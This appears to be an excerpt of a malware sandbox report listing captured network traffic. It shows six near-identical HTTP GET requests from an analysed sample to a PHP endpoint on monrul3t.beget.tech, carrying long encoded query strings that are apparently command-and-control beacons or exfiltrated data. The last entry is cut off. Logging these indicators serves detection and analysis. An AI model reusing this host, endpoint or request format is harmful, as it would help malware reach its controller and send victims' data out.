              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.tech
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=QX9JiI6ICNmNGOkRzYlFjZzQjM1QzY0M2N0QWOzYTO2kTY2AzNkJCLiczNlVGO4EDMwQWOkFDN5Y2M0UTYyYDNzQjYyImY5YjN3kDZzEjY0gjI6ISZ2EGO1kzY5EGZjZ2M1YmM2UWMjZTY5ADNyQWOjJmYjJCLiQzY5UzNyEDOxcDO5gjZkJWM2MGO0cDM3YzY5EGOhRTOkRWNjhjNwIjI6ICNkhzMxUmYzUDM5cDZilzMhdzYlNGNxEWNwQGZmN2YhJyes0nI5EjbJBTVq9UNNp2TzEkaJZTSpplMjpnTwcGVahXV65UMNpmTq5EVPFTVtl1aKdVTwkFRPtGZE9EakRkWop0VZlmRXpVbSJTTpdXaJxWQ61UavpWS1EEVNJzaqlVeFRkWopleONTSU1UNRRVTwEFVaBzYE9keNpXT3llaapmTE1EMBpnT5VkaadXSDxUaVNUTp9maJtmWE9UbCpWWyUkaZhmRX1EbGR1TxkkMZxmVq1EboRUT3VkaOFzY6lFbCRVWwU0VPlmStplMJNETpV1QNdXRqlkNJNUTxEFVNJTWE5kMFR1TrJleNdXStpleZpmWwcGVORTUX9kaGpmWwEEVZhmWt5EbWpmT0UleNl2dpl0LJl2TpFlaZNTVtllaWdVTqZleNJTQ650asRVTqp0RP1mUH5kMZJTT41EValXVU10MZRVT0k1RPNzZql0cJlHUp9maJd3ZEpVMRdkW3VERNlXVE9UNVJTWoJlMO1mQUpFNVdVW4VkMNNTTq5ENZ1mTwsGVNtGZE1EeJNETp1EWid2a61UavpWS0cGVOlmWt1EMNpWWqZ1VNNTSy0UeRdkWyUkMZtmRq5EbSJjTsJVbalmTt5EbCpnTtJlaZtmS5VmNJNVWwY0RSBDaYpVa3NlT2k0QkFTOXpFdsdkV3Z1VaNnTsl0cJlnW1x2RjxmVHJGVKl2Tp1EWkBjRHRGVshEZwpFWhBjTXFVa3lWSp9maJNTOHpVdsJjVV5UVRl2dpl0TKl2TpBzVZpmSXpFWOhVYpdXaJplSp9UaV1mY2h2RjZnSzkFcxAzYwp0QMl2aD90Zj1mYwJESjxmUzU1ZNRkT4F0QixmUyImTClmTntGSiBXMXl1RCNkTyc3VaBTNXN1bBlWZJRWRJdXUqxUeBNUUnFERNJTWElkVCFTUnlEVL5kUGtEbKNjYEJ0ULNFaDJGbS5mYKpUaPlWVXJGa1UlVR50aJNXSTt0QkVUS4d2QJhkTwQFRKpWS2k0UaRnRtRlVCFjUpdXaJplSp9Ua0cVY0J1VRpHbtl0cJlWS2kUeSJkUsl0cJNEZwpURJBTWElEbOhVY5JkbjxmUuJmRCNUT4FUejNTOHpVdsJjVp9maJlnVtZVdsJjVpd3Uml2ctNmdsFDWzYVbUZXRykFcKhlW0Z0aJZTSTpVd50WZsFzVhBjSDxUaBRUT3FERNdXSp9Ua3dVWw40MidnSDxUaNhlWwY0RkRlQDpFbShVY1ZlRJRXQDpFbs1mWw50VadnTIlEM50GVp9maJ5mSzIWa3lWS0kFRNdHND50MwMET6lEVNNDND1EMJl2Tp1kMiNnSDxUaNZlVp9maJVjSIRWdWNjYqp0QMl2ctNmdsZUSzYVbUl2bqlUd5cVYuZVbjl2dplkcKNjYaJUekxWNrlkNJNVZwwmMZl2dplUNnRVT11kaNhHNp5EM0M0Tp9maJdHbtl0NwpWS2pVbipkQYNVa3lWS6ZVbiZHctlkNJNlW0ZUbUlnVyMmVKNETpNGROpXV610dJl2TpV1VihWNwEVUKNETplkeNVXVqxEMJl2TplEWadlSYplMKhlWUp0QMlWT5FVavpWSsJEWlVlSYplMKhlWUpUelJiOiQjZjhDZ0MWZxY2M0ITN0MGNjdDNklzM2kjN5EmNwcDZiwiIjNWYmZmYkJmMzYDMxUDM1QWO2E2MmVWOxgjYjlTZjNDNiZGO3UjN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=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 HTTP/1.1Accept: */*Content-Type: text/javascriptUser-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36Host: monrul3t.beget.techConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /c243cb78.php?Yk0Jysk7Wv2bEPPnc6Xb68b4=FIp3142uKfvaRomPFgmbSltY&8kUIxZI=Ztk4Ef0Aq4udNKRvL1cycbdYQs3Thm&88027ace558436146eeb7775aaa1bc49=wM3MDOwQmMhVmMlVWY5MmNiR2NlFmNlNzM1gTNmF2N1ATO4ATYzYTOzQjM3ATO5cDNxITNxAjN&9d38ba4b7300523a983f9d7476ad101b=wMxMmYmlDZzMzNzQjZwIGZihDN2IDO3EDO3MjNmRTMiN2YkJmMiN2N&3851bd3bb00604c6082cb34214ed38c8=d1nI3cTZlhDOxADMklDZxQTOmNDN1EmM2QzM0ImMiJWO2YzN5Q2MxIGN4IiOiUmNhhTN5MWOhR2YmNTNmJjNlFzY2EWOwQjMklzYiJ2YiwiI0MWO1cjMxgTM3gTO4YGZiFjNjhDN3AzN2MWOhhTY0kDZkVzY4YDMyIiOiQDZ4MTMlJ2M1ATO3QmY5MTY3MWZjRTMhVDMkRmZjNWYis3W&c9ac4e72985eee3d90507dfb878ca2be=d1nIiojI0Y2Y4QGNjVWMmNDNyUDNjRzY3QDZ5MjN5YTOhZDM3QmIsIyN3UWZ4gTMwADZ5QWM0kjZzQTNhJjN0MDNiJjYiljN2cTOkNTMiRDOiojIlZTY4UTOjlTYkNmZzUjZyYTZxMmNhlDM0IDZ5MmYiNmIsICNjlTN3ITM4EzN4kDOmRmYxYzY4QzNwcjNjlTY4EGN5QGZ1MGO2AjMiojI0QGOzETZiNTNwkzNkJWOzE2NjV2Y0ETY1ADZkZ2YjFmI7xSfikTMulEMBp2T1UkaPFTRqlkNJlmWyMmeOBzZUpFeVpnTx0kaOpmTU9UMV1WWrp0VNBTWE90akR0ToRGRahmSXlVaGdlWtJlMNl2dplEbBpXTp9maJVTQU1kMrpWW5VERahmW650MJRVT1EFVNBTUUpFMjR0T61keNdXWqplaORUTwEkeOlXRqp1dJNETpV1QNl2bql0aaR0TtJkaZJTRqlFaGdVTsZEVPFTSykFbWpWTshGRNdXRq5UMjpXWsJEVZBTRX9UaK1mWyk0QMlWVD10dFpWS2k0QNFTUU1kMZRkTyUEVPtmU610dJ1mW6llaaBzZU5ENRd1TqZkaaBTQUlFaa1mTsZlaORTV61Ua3lWSvkUaPlWUql1MV1WWqZ1VNpmV61kMBpnTrxGVNpmSH9UbSdkTyklMNhXTUpVeVRVTzkFVNRTWH90MnpWSzlUeQl2bql0dnRkWxE1